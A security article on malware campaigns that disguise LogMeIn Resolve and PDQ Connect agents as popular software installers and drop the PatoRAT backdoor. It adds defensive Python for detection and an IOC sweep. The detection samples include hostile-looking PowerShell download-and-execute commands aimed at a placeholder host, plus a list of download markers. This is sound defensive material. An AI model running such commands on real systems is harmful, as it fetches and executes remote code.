Cybercriminals Exploit RMM Tools LogMeIn and PDQ Connect to Deploy Malware Disguised as Legitimate Software
Cybercriminals are distributing malware under the guise of legitimate software installers by abusing Remote Monitoring and Management (RMM) tools such as LogMeIn Resolve and PDQ Connect. Because the RMM agent is a legitimate commercial product, the remote access it provides is easily mistaken for routine administration and often passes conventional security controls unnoticed.
The Deceptive Strategy
The attack begins when unsuspecting users visit counterfeit websites that closely mimic the official download pages of popular applications such as Notepad++, 7-Zip, WinRAR and even ChatGPT. These sites offer what look like genuine installers. On execution, however, the installer deploys a modified installer of an RMM agent, specifically LogMeIn Resolve or PDQ Connect, configured to enroll the machine with the attackers, who then have full remote control of the compromised system.
Execution and Control
Once the malicious RMM software is installed, attackers can execute PowerShell commands remotely to download and install additional malware. A notable payload in this campaign is PatoRAT, a backdoor developed in Delphi. PatoRAT exhibits several concerning capabilities:
– Data Collection: It gathers comprehensive information about the infected system, including computer name, username, operating system details, memory usage, screen resolution, and active windows.
– Remote Control: The malware supports functions such as mouse control, screen capture, keylogging, and the theft of browser passwords.
– Persistence: PatoRAT can install port-forwarding tools, which keep a route into the host open and sustain the operators' access.
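The chain described above (an RMM agent spawns PowerShell, and that PowerShell fetches the next stage) is something a detection engineer can look for in process-creation telemetry. The following Python is an added example, not code from the article or from any vendor named in it: it runs a simple rule over constructed process events and decodes -EncodedCommand payloads before matching, since the download command is frequently hidden that way. The agent process names resolve_agent.exe and pdq-connect-agent.exe are placeholders assumed for illustration; replace them with the binaries you actually observe in your environment.

```python
import base64
import ntpath
import re

# ASSUMED for illustration: process names for the LogMeIn Resolve and PDQ Connect
# agents. Replace with the binaries observed in your own telemetry.
RMM_PARENT_NAMES = {"resolve_agent.exe", "pdq-connect-agent.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that show PowerShell fetching content from the network.
DOWNLOAD_MARKERS = (
    "invoke-webrequest", "iwr ", "invoke-restmethod", "irm ",
    "downloadstring", "downloadfile", "net.webclient",
    "start-bitstransfer", "curl ", "wget ",
)

# -EncodedCommand (and its short forms) carries base64 of UTF-16LE script text.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded script to a command line that uses -EncodedCommand."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: match on the raw line only
    return f"{cmdline} {decoded}"


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def analyze(events):
    """Return findings for PowerShell spawned by an RMM agent that downloads content."""
    findings = []
    for idx, ev in enumerate(events):
        if basename(ev["image"]) not in SHELLS:
            continue
        if basename(ev["parent_image"]) not in RMM_PARENT_NAMES:
            continue
        cmd = expand_encoded(ev["command_line"]).lower()
        marker = next((m for m in DOWNLOAD_MARKERS if m in cmd), None)
        if marker:
            findings.append({"index": idx, "parent": basename(ev["parent_image"]),
                             "marker": marker.strip()})
    return findings


# Constructed sample events (Sysmon event 1 / EDR-style fields), not real telemetry.
_ENC_PAYLOAD = base64.b64encode(
    "Invoke-WebRequest -Uri http://example.invalid/x.exe -OutFile x.exe".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Resolve\resolve_agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/p.ps1')\""},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Invoke-WebRequest http://example.invalid/a"},
    {"parent_image": r"C:\Program Files\PDQ\pdq-connect-agent.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": f"pwsh.exe -nop -w hidden -enc {_ENC_PAYLOAD}"},
    {"parent_image": r"C:\Program Files\PDQ\pdq-connect-agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-Service"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['parent']} -> PowerShell ({f['marker']})")
```

The rule deliberately ignores the explorer.exe-parented download (event 1) and the harmless Get-Service run (event 3): it fires only on the combination the campaign relies on, an RMM agent as parent plus a network fetch in the child. In an estate where administrators legitimately push scripts through the same RMM product, tune it by allowlisting known script sources rather than by dropping the parent-process condition.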
Indicators of Compromise
Security researchers have identified specific company identification numbers embedded within the LogMeIn configuration files used in these attacks. The following company IDs have been associated with the malicious activity:
– 8347338797131280000
– 1995653637248070000
– 4586548334491120000
Three distinct identifiers suggest that more than one attacker-controlled RMM account, and possibly more than one threat actor, is being used to control infected systems.
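An incident responder will want to sweep hosts for those company IDs. The following Python is an added example, not code from the article: it walks a directory, decodes each candidate file as UTF-8 or UTF-16 (Windows tools often write the latter, with or without a byte-order mark), and reports files carrying a listed ID, alongside any other 19-digit value found so unfamiliar IDs can be reviewed. The sample files it writes are constructed for the demonstration and are not real agent configurations; the list of file extensions to scan is an assumption to adjust for where the agents keep their settings on your hosts.

```python
import re
import tempfile
from pathlib import Path

# Company IDs the article lists as indicators of compromise.
MALICIOUS_COMPANY_IDS = {
    "8347338797131280000",
    "1995653637248070000",
    "4586548334491120000",
}

# The IOCs are 19-digit numbers; report every such value so unknown IDs can be reviewed.
ID_RE = re.compile(r"(?<!\d)\d{19}(?!\d)")

# ASSUMED: file extensions worth scanning. Adjust to where the agents keep config on your hosts.
CONFIG_SUFFIXES = (".xml", ".json", ".ini", ".cfg", ".config", ".txt")


def decode_config(raw: bytes) -> str:
    """Decode a config file that may be UTF-8 or UTF-16 (Windows tools often write UTF-16)."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    # BOM-less UTF-16LE of mostly-ASCII text has a NUL in nearly every odd byte.
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def scan_text(text: str):
    """Return (all 19-digit IDs found, subset that are known-bad)."""
    ids = set(ID_RE.findall(text))
    return ids, ids & MALICIOUS_COMPANY_IDS


def sweep(root) -> list:
    """Walk root and report files containing a known-bad company ID."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in CONFIG_SUFFIXES:
            continue
        try:
            ids, bad = scan_text(decode_config(path.read_bytes()))
        except OSError:
            continue
        if bad:
            hits.append({"name": path.name, "path": str(path),
                         "bad_ids": sorted(bad), "other_ids": sorted(ids - bad)})
    return hits


def build_sample_tree(root) -> None:
    """Write constructed sample files (not real agent configs) for demonstration."""
    root = Path(root)
    # UTF-16 with BOM, carrying one of the listed IDs.
    (root / "agent.config").write_bytes(
        "<Config><CompanyId>8347338797131280000</CompanyId></Config>".encode("utf-16"))
    # UTF-8 with a 19-digit value that is not on the list.
    (root / "settings.json").write_bytes(b'{"companyId": "1234567890123456789"}')
    # BOM-less UTF-16LE with a listed ID and an unrelated one.
    (root / "other.ini").write_bytes(
        "company=1995653637248070000\r\nlicense=9999999999999999999\r\n".encode("utf-16-le"))
    # Extension outside the scan list: deliberately skipped even though it contains an IOC.
    (root / "notes.log").write_bytes(b"4586548334491120000")


def demo() -> list:
    """Build the sample tree in a temp dir and return the sweep results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sweep(tmp)


if __name__ == "__main__":
    for h in demo():
        print(f"{h['path']}: bad={h['bad_ids']} other={h['other_ids']}")
```

Point the sweep at the agent's installation and ProgramData directories; a hit with a listed ID is confirmation of the campaign, while an unlisted ID in a host that should have no RMM agent at all is still worth escalating.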
Geographical Indicators
Portuguese-language strings in PatoRAT's code indicate that its developers may come from a Portuguese-speaking region. Language artifacts are a weak attribution signal on their own, since they can be copied from other code or planted deliberately, so this should be treated as a lead rather than a conclusion about the actors behind the campaign.
Preventive Measures
To mitigate the risk of such attacks, users and organizations are advised to adopt the following security practices:
– Download from Official Sources: Always obtain software from official websites or trusted repositories to ensure authenticity.
– Verify Digital Certificates: Before executing a downloaded file, check that it carries a valid digital signature and that the publisher is the vendor of the software you intended to install. A valid signature alone is not enough here: an "installer" for Notepad++ or 7-Zip whose signer is an RMM vendor is exactly the mismatch this campaign relies on.
– Maintain Updated Security Software: Keep antivirus and anti-malware programs updated, and inventory the RMM agents present on endpoints so that any agent outside the organization's approved tooling is flagged for investigation.
– User Education: Educate users about the risks of downloading software from unverified sources and the importance of scrutinizing download links and websites.
Conclusion
The abuse of legitimate RMM tools such as LogMeIn Resolve and PDQ Connect shows how attackers turn trusted administrative software into an intrusion channel. By disguising the agent as a routine software installation, they gain remote control that looks like ordinary management traffic, which is why download hygiene, publisher verification and visibility into which RMM agents are running are all needed to counter this tactic.